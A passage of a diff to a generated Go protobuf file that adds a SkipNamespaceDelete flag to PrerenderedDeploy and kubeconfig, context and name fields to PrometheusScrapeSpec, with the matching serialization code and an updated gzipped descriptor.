0xfc, 0xce, 0x4d, 0xdf, 0x98, 0xaf, - 0x3d, 0xe1, 0x94, 0x9a, 0xbe, 0xf2, 0x0a, 0xb3, 0x57, 0xde, 0xbd, 0x3f, 0xa6, 0x71, 0x08, 0xff, - 0xa8, 0x01, 0xb5, 0xe1, 0x71, 0x07, 0x1f, 0x5b, 0x27, 0xfd, 0xcf, 0xfb, 0x7b, 0xb8, 0x91, 0x43, - 0xd7, 0x60, 0x5d, 0x21, 0x9f, 0x1d, 0xe1, 0xc7, 0x07, 0x47, 0x9d, 0xdd, 0x61, 0xc3, 0x40, 0x9b, - 0x70, 0x53, 0x81, 0x4f, 0xf6, 0x8e, 0x71, 0xbf, 0x67, 0xe1, 0xbd, 0xde, 0x11, 0xde, 0xdd, 0xc3, - 0xc3, 0x46, 0x1e, 0xad, 0x43, 0x75, 0x78, 0x7c, 0x34, 0x48, 0x3c, 0x14, 0x10, 0x82, 0xba, 0x04, - 0x66, 0x0e, 0x8a, 0xe8, 0x16, 0xdc, 0x90, 0xd8, 0x15, 0xfb, 0x15, 0x54, 0x82, 0x02, 0xfe, 0xf4, - 0xb0, 0xb1, 0x8a, 0x00, 0x56, 0xbb, 0x9f, 0xe2, 0xc3, 0xfe, 0x61, 0xa3, 0xd4, 0xed, 0xbe, 0x78, - 0xd9, 0xca, 0x7d, 0xf9, 0xb2, 0x95, 0xfb, 0xea, 0x65, 0xcb, 0xf8, 0xd5, 0xb4, 0x65, 0xfc, 0x69, - 0xda, 0x32, 0xfe, 0x36, 0x6d, 0x19, 0x2f, 0xa6, 0x2d, 0xe3, 0x1f, 0xd3, 0x96, 0xf1, 0xcf, 0x69, - 0x2b, 0xf7, 0xd5, 0xb4, 0x65, 0xfc, 0xee, 0x55, 0x2b, 0xf7, 0xe2, 0x55, 0x2b, 0xf7, 0xe5, 0xab, - 0x56, 0xee, 0xf3, 0x5a, 0xf6, 0xaf, 0x84, 0xd3, 0x55, 0x99, 0x9b, 0x0f, 0xff, 0x13, 0x00, 0x00, - 0xff, 0xff, 0x11, 0xaf, 0xeb, 0x55, 0x78, 0x10, 0x00, 0x00, + // 1859 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcf, 0x73, 0x1b, 0x49, + 0xf5, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0x8e, 0xf3, 0x55, 0xbc, 0x29, 0x39, 0xab, + 0xad, 0x2f, 0x84, 0xb0, 0x6b, 0x13, 0x2f, 0x3f, 0xcc, 0x66, 0xd9, 0x2a, 0x49, 0x36, 0x58, 0x89, + 0x63, 0x8b, 0x96, 0xd7, 0x0b, 0x5b, 0x54, 0x4d, 0x8d, 0x67, 0xda, 0xf2, 0x94, 0x47, 0x33, 0x93, + 0xe9, 0x56, 0xd6, 0xe6, 0xc4, 0x85, 0xe2, 0x44, 0x15, 0x07, 0xf8, 0x0f, 0x38, 0xec, 0x9f, 0xc0, + 0x9d, 0x03, 0x70, 0xcb, 0x81, 0xc3, 0x9e, 0x5c, 0x44, 0xb9, 0x70, 0xdc, 0xff, 0x00, 0xaa, 0x5f, + 0xf7, 0x8c, 0x46, 0xb2, 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x4f, 0x7f, 0xde, 0xeb, 0xf7, 0x5e, 0xbf, + 0x1f, 0x2d, 0xc1, 0x77, 0x79, 0x64, 0x6f, 0xb1, 0x6d, 0x66, 0x0a, 0xc6, 0xc5, 0x56, 0xc8, 0xa2, + 0x33, 0x53, 0x04, 0x81, 0xb7, 0xc5, 0x2e, 0x43, 0x16, 0xb9, 0x43, 0xe6, 0x8b, 0xf0, 0x34, 0xf5, + 0xb1, 0x19, 0x46, 0x81, 0x08, 0x48, 0x25, 0xbc, 0xdc, 0x4c, 0xb8, 0xeb, 0x8d, 0x41, 0x10, 0x0c, + 0x3c, 0xb6, 0x85, 0x7b, 0xa7, 0xa3, 0xb3, 0x2d, 0x67, 0x14, 0x59, 0xc2, 0x0d, 0x7c, 0xc5, 0x5e, + 0xbf, 0x35, 0x08, 0x06, 0x01, 0x2e, 0xb7, 0xe4, 0x4a, 0xa1, 0xcd, 0x7f, 0x65, 0xa1, 0xba, 0x97, + 0x28, 0xee, 0x87, 0xcc, 0x26, 0x8f, 0xa0, 0xfc, 0xdc, 0xfd, 0xa5, 0xcb, 0x22, 0x93, 0x87, 0xcc, + 0xae, 0x1b, 0xf7, 0x8c, 0xfb, 0xe5, 0xed, 0xf5, 0xcd, 0xf4, 0x61, 0x9b, 0x9f, 0x05, 0xd1, 0x85, + 0x17, 0x58, 0x8e, 0x14, 0xa0, 0xa0, 0xe8, 0x28, 0xdc, 0x82, 0xea, 0x17, 0x7a, 0x0f, 0xc5, 0x79, + 0x3d, 0x7b, 0x2f, 0xf7, 0x16, 0xf9, 0xa5, 0x2f, 0x52, 0x5f, 0x9c, 0x3c, 0x82, 0xca, 0x90, 0x89, + 0xc8, 0xb5, 0xb5, 0x82, 0x1c, 0x2a, 0xa8, 0x4f, 0x2b, 0x78, 0x8a, 0x0c, 0x14, 0x2f, 0x0f, 0x93, + 0x35, 0x27, 0x1f, 0x43, 0xc5, 0xf6, 0x46, 0x5c, 0xc4, 0xd6, 0xe7, 0xd1, 0xfa, 0x3b, 0xd3, 0xc2, + 0x1d, 0xc5, 0x50, 0xd2, 0xf6, 0xe4, 0x83, 0x7c, 0x07, 0x8a, 0xd1, 0xc8, 0x57, 0x92, 0x0b, 0x28, + 0xb9, 0x36, 0x2d, 0x49, 0x47, 0x3e, 0x4a, 0x15, 0x22, 0xb5, 0x20, 0xef, 0x03, 0xd8, 0xc1, 0x70, + 0xe8, 0x0a, 0x93, 0x9f, 0x5b, 0xf5, 0xc5, 0x7b, 0xc6, 0xfd, 0x52, 0x7b, 0x69, 0x7c, 0xbd, 0x51, + 0xea, 0x20, 0xda, 0xdf, 0x6f, 0xd1, 0x92, 0x22, 0xf4, 0xcf, 0x2d, 0x42, 0x20, 0x2f, 0xac, 0x01, + 0xaf, 0x17, 0xee, 0xe5, 0xee, 0x97, 0x28, 0xae, 0x9b, 0x7f, 0x31, 0xa0, 0x92, 0x0e, 0x87, 0x24, + 0xf9, 0xd6, 0x90, 0x61, 0xe0, 0x4b, 0x14, 0xd7, 0x32, 0x26, 0x0e, 0x0b, 0xbd, 0xe0, 0xca, 0xe4, + 0x82, 0x85, 0x71, 0x50, 0x67, 0x62, 0xb2, 0x8b, 0x8c, 0xbe, 0x60, 0x21, 0x2d, 0x3b, 0xc9, 0x9a, + 0x93, 0x1f, 0x41, 0xe5, 0x9c, 0x59, 0x9e, 0x38, 0xb7, 0xcf, 0x99, 0x7d, 0x11, 0x07, 0x74, 0x26, + 0x26, 0xfb, 0xc8, 0xe8, 0x48, 0x06, 0x9d, 0xa2, 0x93, 0x6f, 0xc2, 0xb2, 0x65, 0xcb, 0x44, 0x32, + 0x39, 0xf3, 0x98, 0x2d, 0x82, 0x08, 0xa3, 0x5a, 0xa2, 0x55, 0x05, 0xf7, 0x35, 0xda, 0xfc, 0x9b, + 0x01, 0x30, 0xb1, 0x81, 0x74, 0xa0, 0x1c, 0x46, 0x2c, 0x62, 0xbe, 0xc3, 0x22, 0xe6, 0xe8, 0x3c, + 0xda, 0x98, 0x3e, 0xb5, 0x37, 0x21, 0x28, 0xc9, 0xfd, 0x0c, 0x4d, 0x4b, 0x91, 0x8f, 0xa0, 0xc8, + 0x2f, 0xac, 0xb3, 0xb3, 0xc0, 0x73, 0xea, 0x59, 0xd4, 0x70, 0x77, 0x5a, 0x43, 0x5f, 0xef, 0x26, + 0xe2, 0x09, 0x9f, 0x7c, 0x1b, 0xb2, 0xe1, 0x65, 0x3d, 0x37, 0x2f, 0x03, 0x7a, 0x97, 0x9d, 0x83, + 0x6e, 0x22, 0x92, 0x0d, 0x2f, 0xdb, 0x4b, 0xa0, 0x63, 0x66, 0x8a, 0xab, 0x90, 0x35, 0x7f, 0x6f, + 0x40, 0x39, 0x15, 0x12, 0xf2, 0x31, 0xe4, 0x2e, 0x76, 0xf8, 0x7c, 0x27, 0x9e, 0xec, 0xf4, 0x7b, + 0x81, 0xc3, 0x29, 0xb3, 0x9c, 0x2b, 0x64, 0xb7, 0x0b, 0xe3, 0xeb, 0x8d, 0xdc, 0x93, 0x9d, 0xfe, + 0x7e, 0x86, 0x4a, 0x31, 0xf2, 0x43, 0xc8, 0x85, 0x97, 0xde, 0x7c, 0x07, 0x7a, 0x97, 0x07, 0xa9, + 0x83, 0x94, 0xa8, 0xc4, 0x32, 0x54, 0xca, 0xb4, 0x2b, 0x00, 0x78, 0x0f, 0xca, 0xac, 0x87, 0xb0, + 0x72, 0xe3, 0x34, 0x72, 0x17, 0x4a, 0x32, 0x49, 0x78, 0x68, 0xd9, 0x71, 0xd6, 0x4c, 0x80, 0xe6, + 0x11, 0x54, 0xa7, 0x8f, 0x20, 0xb7, 0x61, 0x91, 0xdb, 0x91, 0x1b, 0x0a, 0x4d, 0xd6, 0x5f, 0xe4, + 0xff, 0xa1, 0xca, 0x47, 0xb6, 0xcd, 0x38, 0x37, 0xed, 0xc0, 0x1b, 0x0d, 0x7d, 0x34, 0xb8, 0x44, + 0x97, 0x34, 0xda, 0x41, 0xb0, 0xf9, 0x0b, 0x28, 0xf5, 0x2c, 0x61, 0x9f, 0x63, 0xb2, 0xde, 0x85, + 0xfc, 0x95, 0x35, 0xf4, 0x94, 0xa6, 0x76, 0x71, 0x7c, 0xbd, 0x91, 0xff, 0x79, 0xeb, 0xe9, 0x01, + 0x45, 0x94, 0x3c, 0x84, 0x45, 0x61, 0x45, 0x03, 0x26, 0xb4, 0xeb, 0xb3, 0xb7, 0x20, 0xd5, 0x1c, + 0x23, 0x81, 0x6a, 0x62, 0xf3, 0x37, 0x59, 0x28, 0xa7, 0x70, 0xf2, 0x2d, 0x28, 0x59, 0xa1, 0x6b, + 0x0e, 0xa2, 0x60, 0x14, 0xea, 0x53, 0x2a, 0xe3, 0xeb, 0x8d, 0x62, 0xab, 0xd7, 0xfd, 0x89, 0xc4, + 0x68, 0xd1, 0x0a, 0x5d, 0x5c, 0x91, 0x2d, 0x28, 0x4b, 0xea, 0x73, 0x16, 0x71, 0x37, 0xd0, 0xc6, + 0xb7, 0xab, 0xe3, 0xeb, 0x0d, 0x68, 0xf5, 0xba, 0x27, 0x0a, 0xa5, 0x60, 0x85, 0xae, 0x5e, 0xcb, + 0x4a, 0xbb, 0x70, 0x7d, 0x07, 0x53, 0xa4, 0x44, 0x71, 0x9d, 0x54, 0x5f, 0x3e, 0x55, 0x7d, 0x53, + 0x01, 0x5e, 0x98, 0x09, 0xb0, 0x0c, 0x9b, 0x67, 0x9d, 0x32, 0x6f, 0x52, 0x1e, 0x8b, 0x2a, 0x6c, + 0x88, 0xc6, 0xd5, 0x41, 0xb6, 0x60, 0xd5, 0xf2, 0xfd, 0x40, 0x58, 0xd3, 0xa5, 0x54, 0x40, 0x2e, + 0x99, 0x6c, 0x25, 0xe5, 0xf4, 0xa5, 0x01, 0x2b, 0x37, 0xea, 0x43, 0x36, 0x1c, 0x19, 0x5a, 0x33, + 0xb4, 0xc4, 0xb9, 0xcc, 0xc7, 0x5c, 0xdc, 0x70, 0x64, 0xd8, 0x7b, 0x12, 0xa4, 0x25, 0x49, 0xc0, + 0x25, 0x79, 0x08, 0x85, 0x50, 0x06, 0x93, 0xc5, 0x2d, 0xe3, 0xff, 0xe6, 0xdc, 0x80, 0xea, 0x68, + 0x9a, 0x47, 0xb6, 0x61, 0x8d, 0x5f, 0xb8, 0xa1, 0x99, 0x38, 0x68, 0x3a, 0xcc, 0x63, 0x82, 0x61, + 0x94, 0x8a, 0x74, 0x55, 0x6e, 0x1e, 0xc6, 0x7b, 0xbb, 0xb8, 0xd5, 0xfc, 0xad, 0x01, 0xd5, 0xe9, + 0x42, 0x24, 0xef, 0xc1, 0x52, 0x5c, 0x88, 0x68, 0xab, 0xce, 0xb5, 0x4a, 0x0c, 0x4a, 0xfb, 0xa6, + 0x48, 0x56, 0x34, 0x50, 0x46, 0xa6, 0x48, 0xad, 0x68, 0x30, 0xe5, 0x43, 0xee, 0x3f, 0xf3, 0xa1, + 0x79, 0x05, 0xe5, 0x54, 0x85, 0xcb, 0x3b, 0x45, 0xed, 0x86, 0x6a, 0xbb, 0x72, 0x4d, 0x1a, 0x00, + 0x89, 0x87, 0xf1, 0xb9, 0x29, 0x84, 0x7c, 0x1f, 0xaa, 0x9c, 0x09, 0x33, 0x1e, 0x26, 0xae, 0xca, + 0x92, 0x62, 0xbb, 0x36, 0xbe, 0xde, 0xa8, 0xf4, 0x99, 0xd0, 0x33, 0xa4, 0xbb, 0x4b, 0x2b, 0x7c, + 0xf2, 0xe5, 0x34, 0xff, 0x64, 0x00, 0x4c, 0x86, 0x13, 0xd9, 0x51, 0x95, 0xaf, 0xfa, 0xc6, 0x3b, + 0x37, 0x2a, 0xbf, 0x8f, 0x95, 0x27, 0x99, 0xb3, 0x85, 0x4f, 0x76, 0x20, 0x1f, 0x46, 0xc1, 0x50, + 0x57, 0x4e, 0x73, 0xb6, 0x6f, 0x06, 0x43, 0x26, 0xce, 0xd9, 0x88, 0xf7, 0xed, 0xc8, 0x0a, 0x99, + 0xd4, 0xb0, 0x9f, 0xa1, 0x28, 0x31, 0xaf, 0x61, 0x3b, 0xf3, 0x1a, 0xb6, 0xec, 0x79, 0x7a, 0xd2, + 0x62, 0x73, 0x19, 0xe7, 0x60, 0x69, 0xca, 0xa6, 0xd7, 0x76, 0x8a, 0xbb, 0x50, 0xe2, 0x22, 0x62, + 0xd6, 0xd0, 0xf5, 0x07, 0x68, 0x60, 0x91, 0x4e, 0x00, 0xf2, 0x63, 0x58, 0xb1, 0x03, 0x4f, 0x9e, + 0x21, 0x6d, 0x90, 0x6f, 0x8b, 0xc0, 0x49, 0xda, 0xb0, 0x7a, 0xa5, 0x6c, 0xc6, 0xaf, 0x94, 0xcd, + 0x5d, 0xfd, 0x4a, 0xa1, 0xb5, 0x89, 0x4c, 0x0f, 0x45, 0xc8, 0xcf, 0x60, 0x59, 0xb0, 0x61, 0xe8, + 0x59, 0x82, 0x99, 0xcf, 0x2d, 0x6f, 0xc4, 0x78, 0x3d, 0x8f, 0x09, 0xb0, 0xf5, 0x86, 0x38, 0x6e, + 0x1e, 0x6b, 0x91, 0x13, 0x94, 0xd8, 0xf3, 0x45, 0x74, 0x45, 0xab, 0x62, 0x0a, 0x24, 0x14, 0x96, + 0x84, 0x75, 0xea, 0x31, 0x33, 0x18, 0x89, 0x70, 0x24, 0x78, 0x7d, 0x01, 0xf5, 0x7e, 0xf0, 0x46, + 0xbd, 0x52, 0xe0, 0x48, 0xf1, 0x95, 0xd6, 0x8a, 0x48, 0x41, 0xeb, 0x2d, 0x58, 0x9d, 0x73, 0x34, + 0xa9, 0x41, 0xee, 0x82, 0x5d, 0xe9, 0xf8, 0xc9, 0x25, 0xb9, 0x05, 0x0b, 0xe8, 0x8d, 0xee, 0xae, + 0xea, 0xe3, 0xa3, 0xec, 0x8e, 0xb1, 0x7e, 0x0a, 0x2b, 0x37, 0x4e, 0x99, 0xa3, 0xe0, 0x07, 0x69, + 0x05, 0xe5, 0xed, 0x77, 0x5f, 0x63, 0xb5, 0xd2, 0x72, 0xe0, 0x72, 0x91, 0x3a, 0xa3, 0x49, 0x61, + 0x75, 0x0e, 0x83, 0x3c, 0x82, 0x42, 0x1c, 0x0b, 0x03, 0x63, 0xf1, 0x66, 0xad, 0xaa, 0xdc, 0xb4, + 0x44, 0xf3, 0xcf, 0xc6, 0x0d, 0xa5, 0x98, 0x3e, 0x8f, 0x61, 0x89, 0xbb, 0xfe, 0xc0, 0x63, 0xa6, + 0x4a, 0x33, 0x5d, 0x06, 0xef, 0xcd, 0x4c, 0x70, 0xa4, 0xa8, 0x9a, 0xe9, 0x5d, 0x1e, 0x28, 0xf9, + 0xfd, 0x0c, 0xad, 0xf0, 0xd4, 0x06, 0xf9, 0x29, 0xac, 0x38, 0x96, 0xb0, 0x4c, 0x2f, 0xc0, 0xf1, + 0x34, 0xf2, 0x05, 0x8b, 0x74, 0x00, 0x66, 0xf4, 0xed, 0x5a, 0xc2, 0x3a, 0x08, 0xe4, 0xb8, 0x42, + 0x52, 0xa2, 0x6f, 0xd9, 0x99, 0xde, 0x90, 0xe9, 0xaf, 0x3c, 0xc0, 0x07, 0x5f, 0xf3, 0x0f, 0x06, + 0xac, 0xcd, 0xb5, 0x45, 0xb6, 0x29, 0xe1, 0x0e, 0x19, 0x17, 0xd6, 0x30, 0x94, 0xa3, 0x31, 0xee, + 0x65, 0x09, 0xd8, 0x09, 0x3c, 0xb2, 0x91, 0x14, 0x13, 0xce, 0x0f, 0x75, 0xb9, 0xa0, 0x20, 0xd9, + 0x2f, 0xc9, 0x3b, 0x50, 0xc2, 0x6b, 0x40, 0x0d, 0x6a, 0xe4, 0x14, 0x11, 0x90, 0xd2, 0x77, 0xa0, + 0x28, 0xac, 0x81, 0xdc, 0x52, 0x49, 0x5e, 0xa2, 0x05, 0x61, 0x0d, 0x3a, 0x81, 0xc7, 0xe5, 0xb3, + 0x6a, 0x6d, 0xae, 0x4f, 0xff, 0x23, 0xbb, 0x1e, 0x00, 0x70, 0xf6, 0xcc, 0x74, 0x9d, 0x89, 0x61, + 0x6a, 0xc4, 0xf6, 0xd9, 0xb3, 0xee, 0x6e, 0x27, 0xf0, 0x68, 0x91, 0xb3, 0x67, 0x5d, 0x47, 0x2a, + 0xfb, 0x04, 0x96, 0x74, 0xc8, 0x74, 0x59, 0xe7, 0xdf, 0x56, 0xd6, 0x15, 0xc5, 0x57, 0x25, 0xdd, + 0xfc, 0x7b, 0x0e, 0x6e, 0xcd, 0xeb, 0x5d, 0x6f, 0x7e, 0xc3, 0x90, 0x6f, 0xc0, 0xf2, 0x50, 0xb6, + 0x76, 0x53, 0x0d, 0x5a, 0x59, 0x0f, 0xfa, 0x69, 0x82, 0xf0, 0x81, 0x44, 0x9f, 0xb0, 0x2b, 0xf2, + 0x00, 0x56, 0xd2, 0x3c, 0x55, 0x25, 0x2a, 0xd4, 0xcb, 0x13, 0x26, 0x96, 0xa7, 0x1c, 0x0a, 0x61, + 0x10, 0x09, 0xf4, 0x60, 0x81, 0xe2, 0x5a, 0xba, 0xc7, 0xd1, 0xa6, 0xd8, 0xbd, 0x85, 0xb7, 0xba, + 0xa7, 0xf8, 0xba, 0x63, 0x9d, 0x24, 0x3f, 0x5d, 0xd0, 0xf6, 0xfa, 0x22, 0x96, 0xd2, 0x87, 0x6f, + 0xef, 0xdd, 0xfa, 0xf7, 0x0c, 0xce, 0x55, 0xd5, 0x5c, 0xca, 0x93, 0x1b, 0xc2, 0x27, 0xf8, 0xc5, + 0xe8, 0x94, 0xd9, 0x81, 0x7f, 0xe6, 0x0e, 0xd4, 0x38, 0x55, 0xef, 0x86, 0xea, 0x04, 0xc6, 0x81, + 0xfa, 0x2e, 0x54, 0x24, 0x62, 0xda, 0x81, 0x2f, 0xd8, 0xa5, 0xa8, 0x17, 0x91, 0x55, 0x96, 0x58, + 0x47, 0x41, 0xc9, 0x03, 0xa7, 0x34, 0x79, 0xe0, 0xac, 0x7f, 0x02, 0xb5, 0x59, 0x03, 0xfe, 0x9b, + 0xc6, 0xd5, 0x3c, 0x81, 0x72, 0xea, 0x37, 0x95, 0xcc, 0x74, 0x7f, 0x34, 0x34, 0xfd, 0xc0, 0x61, + 0xea, 0xc9, 0xbc, 0x40, 0x8b, 0xfe, 0x68, 0x78, 0x28, 0xbf, 0xc9, 0x03, 0xc8, 0xcb, 0x0d, 0x5d, + 0xbb, 0xb7, 0xa7, 0x63, 0x23, 0x29, 0xd8, 0x5b, 0x90, 0xd3, 0xfc, 0x00, 0x8a, 0x31, 0x22, 0x5d, + 0x1b, 0x5a, 0xf6, 0xb9, 0xeb, 0x33, 0x9c, 0x56, 0xda, 0xb0, 0xb2, 0xc6, 0x8e, 0xe5, 0x00, 0xeb, + 0x42, 0x41, 0xff, 0x40, 0x23, 0xdb, 0x50, 0x50, 0xc3, 0xee, 0x35, 0xbf, 0x1f, 0x5b, 0x6a, 0x12, + 0x62, 0x1b, 0xd3, 0xc4, 0xc7, 0xf9, 0xa2, 0x51, 0xcb, 0x3e, 0xce, 0x17, 0xb3, 0xb5, 0x5c, 0xf3, + 0xd7, 0x06, 0xc0, 0x84, 0x43, 0xde, 0x87, 0x7c, 0x72, 0x68, 0x75, 0xbe, 0x2e, 0x69, 0x01, 0x45, + 0x16, 0xf9, 0x1e, 0x14, 0xe3, 0x1f, 0xdf, 0xc9, 0xc3, 0xf7, 0xb5, 0x19, 0x94, 0x50, 0x93, 0x9b, + 0xc9, 0x4d, 0x6e, 0xe6, 0xc1, 0x1f, 0x13, 0x3b, 0xa4, 0x7e, 0x52, 0x83, 0x4a, 0xff, 0xb8, 0x45, + 0x8f, 0xcd, 0x93, 0xee, 0xe7, 0xdd, 0x3d, 0x5a, 0xcb, 0x90, 0x55, 0x58, 0x56, 0xc8, 0x67, 0x47, + 0xf4, 0xc9, 0xc1, 0x51, 0x6b, 0xb7, 0x5f, 0x33, 0xc8, 0x3a, 0xdc, 0x56, 0xe0, 0xd3, 0xbd, 0x63, + 0xda, 0xed, 0x98, 0x74, 0xaf, 0x73, 0x44, 0x77, 0xf7, 0x68, 0xbf, 0x96, 0x25, 0xcb, 0x50, 0xee, + 0x1f, 0x1f, 0xf5, 0x62, 0x0d, 0x39, 0x42, 0xa0, 0x8a, 0xc0, 0x44, 0x41, 0x9e, 0xdc, 0x81, 0x35, + 0xc4, 0x6e, 0xc8, 0x2f, 0x90, 0x02, 0xe4, 0xe8, 0xa7, 0x87, 0xb5, 0x45, 0x02, 0xb0, 0xd8, 0xfe, + 0x94, 0x1e, 0x76, 0x0f, 0x6b, 0x85, 0x76, 0xfb, 0xc5, 0xcb, 0x46, 0xe6, 0xab, 0x97, 0x8d, 0xcc, + 0xd7, 0x2f, 0x1b, 0xc6, 0xaf, 0xc6, 0x0d, 0xe3, 0xcb, 0x71, 0xc3, 0xf8, 0xeb, 0xb8, 0x61, 0xbc, + 0x18, 0x37, 0x8c, 0x7f, 0x8c, 0x1b, 0xc6, 0x3f, 0xc7, 0x8d, 0xcc, 0xd7, 0xe3, 0x86, 0xf1, 0xbb, + 0x57, 0x8d, 0xcc, 0x8b, 0x57, 0x8d, 0xcc, 0x57, 0xaf, 0x1a, 0x99, 0xcf, 0x2b, 0xe9, 0xff, 0x37, + 0x4e, 0x17, 0x31, 0x36, 0x1f, 0xfe, 0x3b, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xd3, 0xa2, 0xe8, 0x0d, + 0x11, 0x00, 0x00, } func (x ActionType) String() string { @@ -2117,6 +2154,9 @@ func (this *PrerenderedDeploy) Equal(that interface{}) bool { return false } } + if this.SkipNamespaceDelete != that1.SkipNamespaceDelete { + return false + } return true } func (this *SkaffoldDeploy) Equal(that interface{}) bool { @@ -2546,6 +2586,15 @@ func (this *PrometheusScrapeSpec) Equal(that interface{}) bool { return false } } + if this.KubeconfigPath != that1.KubeconfigPath { + return false + } + if this.KubeContext != that1.KubeContext { + return false + } + if this.Name != that1.Name { + return false + } return true } func (this *ClusterSpec) Equal(that interface{}) bool { @@ -2819,12 +2868,13 @@ func (this *PrerenderedDeploy) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 6) + s := make([]string, 0, 7) s = append(s, "&experimentpb.PrerenderedDeploy{") s = append(s, "YAMLPaths: "+fmt.Sprintf("%#v", this.YAMLPaths)+",\n") if this.Patches != nil { s = append(s, "Patches: "+fmt.Sprintf("%#v", this.Patches)+",\n") } + s = append(s, "SkipNamespaceDelete: "+fmt.Sprintf("%#v", this.SkipNamespaceDelete)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -2995,7 +3045,7 @@ func (this *PrometheusScrapeSpec) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 10) + s := make([]string, 0, 13) s = append(s, "&experimentpb.PrometheusScrapeSpec{") s = append(s, "Namespace: "+fmt.Sprintf("%#v", this.Namespace)+",\n") s = append(s, "MatchLabelKey: "+fmt.Sprintf("%#v", this.MatchLabelKey)+",\n") @@ -3017,6 +3067,9 @@ func (this *PrometheusScrapeSpec) GoString() string { if this.MetricNames != nil { s = append(s, "MetricNames: "+mapStringForMetricNames+",\n") } + s = append(s, "KubeconfigPath: "+fmt.Sprintf("%#v", this.KubeconfigPath)+",\n") + s = append(s, "KubeContext: "+fmt.Sprintf("%#v", this.KubeContext)+",\n") + s = append(s, "Name: "+fmt.Sprintf("%#v", this.Name)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -3615,6 +3668,16 @@ func (m *PrerenderedDeploy) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if m.SkipNamespaceDelete { + i-- + if m.SkipNamespaceDelete { + dAtA[i] = 1 + } else { + dAtA[i] = 0 + } + i-- + dAtA[i] = 0x18 + } if len(m.Patches) > 0 { for iNdEx := len(m.Patches) - 1; iNdEx >= 0; iNdEx-- { { @@ -4165,6 +4228,27 @@ func (m *PrometheusScrapeSpec) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if len(m.Name) > 0 { + i -= len(m.Name) + copy(dAtA[i:], m.Name) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.Name))) + i-- + dAtA[i] = 0x4a + } + if len(m.KubeContext) > 0 { + i -= len(m.KubeContext) + copy(dAtA[i:], m.KubeContext) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeContext))) + i-- + dAtA[i] = 0x42 + } + if len(m.KubeconfigPath) > 0 { + i -= len(m.KubeconfigPath) + copy(dAtA[i:], m.KubeconfigPath) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeconfigPath))) + i-- + dAtA[i] = 0x3a + } if len(m.MetricNames) > 0 { for k := range m.MetricNames { v := m.MetricNames[k] @@ -4648,6 +4732,9 @@ func (m *PrerenderedDeploy) Size() (n int) { n += 1 + l + sovExperiment(uint64(l)) } } + if m.SkipNamespaceDelete { + n += 2 + } return n } @@ -4917,6 +5004,18 @@ func (m *PrometheusScrapeSpec) Size() (n int) { n += mapEntrySize + 1 + sovExperiment(uint64(mapEntrySize)) } } + l = len(m.KubeconfigPath) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.KubeContext) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.Name) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } return n } @@ -5169,6 +5268,7 @@ func (this *PrerenderedDeploy) String() string { s := strings.Join([]string{`&PrerenderedDeploy{`, `YAMLPaths:` + fmt.Sprintf("%v", this.YAMLPaths) + `,`, `Patches:` + repeatedStringForPatches + `,`, + `SkipNamespaceDelete:` + fmt.Sprintf("%v", this.SkipNamespaceDelete) + `,`, `}`, }, "") return s @@ -5359,6 +5459,9 @@ func (this *PrometheusScrapeSpec) String() string { `Port:` + fmt.Sprintf("%v", this.Port) + `,`, `ScrapePeriod:` + strings.Replace(fmt.Sprintf("%v", this.ScrapePeriod), "Duration", "types.Duration", 1) + `,`, `MetricNames:` + mapStringForMetricNames + `,`, + `KubeconfigPath:` + fmt.Sprintf("%v", this.KubeconfigPath) + `,`, + `KubeContext:` + fmt.Sprintf("%v", this.KubeContext) + `,`, + `Name:` + fmt.Sprintf("%v", this.Name) + `,`, `}`, }, "") return s @@ -6849,6 +6952,26 @@ func (m *PrerenderedDeploy) Unmarshal(dAtA []byte) error { return err } iNdEx = postIndex + case 3: + if wireType != 0 { + return fmt.Errorf("proto: wrong wireType = %d for field SkipNamespaceDelete", wireType) + } + var v int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + v |= int(b&0x7F) << shift + if b < 0x80 { + break + } + } + m.SkipNamespaceDelete = bool(v != 0) default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) @@ -8569,6 +8692,102 @@ func (m *PrometheusScrapeSpec) Unmarshal(dAtA []byte) error { } m.MetricNames[mapkey] = mapvalue iNdEx = postIndex + case 7: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeconfigPath", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeconfigPath = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 8: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeContext", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeContext = 